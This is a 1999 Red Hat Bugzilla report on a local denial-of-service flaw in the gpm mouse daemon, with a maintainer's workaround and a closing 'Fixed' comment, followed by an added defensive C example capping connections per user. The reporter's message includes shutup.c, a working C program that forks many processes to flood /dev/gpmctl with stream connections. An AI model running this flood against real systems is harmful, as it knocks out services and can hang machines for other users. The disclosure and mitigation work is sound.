Bug 7478 - DoS in gpm
Summary: DoS in gpm
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: gpm
Version: 6.1
Hardware: i386
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Bernhard Rosenkraenzer
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
Reported: 1999-12-01 13:25 UTC by cadence
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2000-01-13 22:14:56 UTC



Description cadence 1999-12-01 13:25:43 UTC
Hello.

There is a bug in gpm similar to the sysklogd one.
It listens on /dev/gpmctl and uses STREAM.

Any user can simply DoS the gpm and (in several circumstances) the whole
system.

Below is the sample code to DoS the gpm.
I couldn't write an exploit to ALWAYS crash the whole system, but I did it
a few times. I don't know why it works and why not.
I think that you are much better programmers than I, so you can do it
yourselves :)
If I write a working exploit I will NOT publish it, so don't worry.


Solutions?
I am not sure if STREAM is needed by gpm. Maybe DGRAM would be a good
solution for that?
Or maybe some changes of permissions on /dev/gpmctl?

Best regards.

Tomasz Grabowski  (0-91)4333950
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl


-------------------------------------------------------------------------

Below is shutup.c, written by someone else.
I made only a few small changes to make it work with gpm.


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

#define PATH    "/dev/gpmctl"
#define SHUTUPS 2000
#define PROCS   100

int
main (void)
{
  int s, i;
  struct sockaddr_un sun;
  char host[128];

  sun.sun_family = AF_UNIX;
  strncpy (sun.sun_path, PATH, 100);
  gethostname (host, 128);

  if (fork ())
    exit (0);

  for (i = 0; i < PROCS; i++)
    if (fork () == 0)
      break;

  for (i = 0; i < SHUTUPS; i++)
    {
      if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
          perror ("socket");
          while (1);
        }

      if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0)
        {
          perror ("connect");
          close (s);
          i--;
        }
    }

  while (1);
}

Comment 1 Bernhard Rosenkraenzer 1999-12-01 15:20:59 UTC
gpm does need STREAM. There's no easy fix for this one.
If you change permissions on /dev/gpmctl, you lose functionality.

The quickfix is to just rm /dev/gpmctl.
This will prevent things like gpm-root from working, but basic gpm functionality
is still there.

I'm looking at it to see if/how it can be fixed without losing functionality.

Comment 2 Bernhard Rosenkraenzer 2000-06-15 21:25:11 UTC
Fixed.
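
An added example, not gpm's code and not the fix referred to in Comment 2 (which this page does not describe): one general way a daemon can keep a world-connectable SOCK_STREAM socket while bounding how many connections a single local user can hold, using Linux's SO_PEERCRED. The cap values and the names peer_uid, admit, release_slot and screen_client are assumptions made for illustration.

```c
#define _GNU_SOURCE             /* struct ucred, SO_PEERCRED (Linux-specific) */
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define MAX_PER_UID 4           /* assumed cap on simultaneous clients per user */
#define MAX_UIDS    64          /* assumed number of users tracked at once */

static struct { uid_t uid; int open; } slots[MAX_UIDS];

/* Ask the kernel who connected; the client cannot forge this value. */
int peer_uid(int fd, uid_t *uid)
{
    struct ucred cred;
    socklen_t len = sizeof cred;
    if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cred, &len) < 0)
        return -1;
    *uid = cred.uid;
    return 0;
}

/* Returns 1 and counts the connection if uid is under its cap, else 0. */
int admit(uid_t uid)
{
    int i, free_slot = -1;
    for (i = 0; i < MAX_UIDS; i++) {
        if (slots[i].open > 0 && slots[i].uid == uid) {
            if (slots[i].open >= MAX_PER_UID)
                return 0;       /* this user already holds the maximum */
            slots[i].open++;
            return 1;
        }
        if (slots[i].open == 0 && free_slot < 0)
            free_slot = i;
    }
    if (free_slot < 0)
        return 0;               /* table full: refuse rather than stop counting */
    slots[free_slot].uid = uid;
    slots[free_slot].open = 1;
    return 1;
}

/* Call whenever an admitted client's descriptor is closed. */
void release_slot(uid_t uid)
{
    int i;
    for (i = 0; i < MAX_UIDS; i++)
        if (slots[i].open > 0 && slots[i].uid == uid) { slots[i].open--; return; }
}

/* Run on every fd returned by accept(): keep it (1) or close it at once (0). */
int screen_client(int fd)
{
    uid_t uid;
    if (peer_uid(fd, &uid) < 0 || !admit(uid)) { close(fd); return 0; }
    return 1;
}
```

Because every forked copy of a flooding client runs under the same UID, the cap applies to all of them together; an idle timeout on admitted clients is still needed so held slots are eventually returned.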

